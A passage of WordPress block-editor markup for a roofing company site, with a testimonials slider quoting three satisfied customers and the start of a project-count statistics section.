block-7b7c381d-2ee6-49d3-980d-86ae77f3a19b\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"a71d05cc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-a71d05cc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-a71d05cc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a3113ac5-0315-4980-91d6-5f8fca2f2ce6\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"724647d4-72e4-4f11-823a-ed346d86135e\"} -->\n<style type=\"text/css\"> .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-724647d4-72e4-4f11-823a-ed346d86135e skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"98ff327e-941a-4894-bff7-2d76ffc2b5d9\"} -->\n<style type=\"text/css\"> .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-98ff327e-941a-4894-bff7-2d76ffc2b5d9\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"f369bfc5-c626-4c6c-93f0-eef984046450\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"f14f54ba-714b-48b2-a325-d252606e8a97\"} -->\n<style type=\"text/css\"> .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f14f54ba-714b-48b2-a325-d252606e8a97\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block 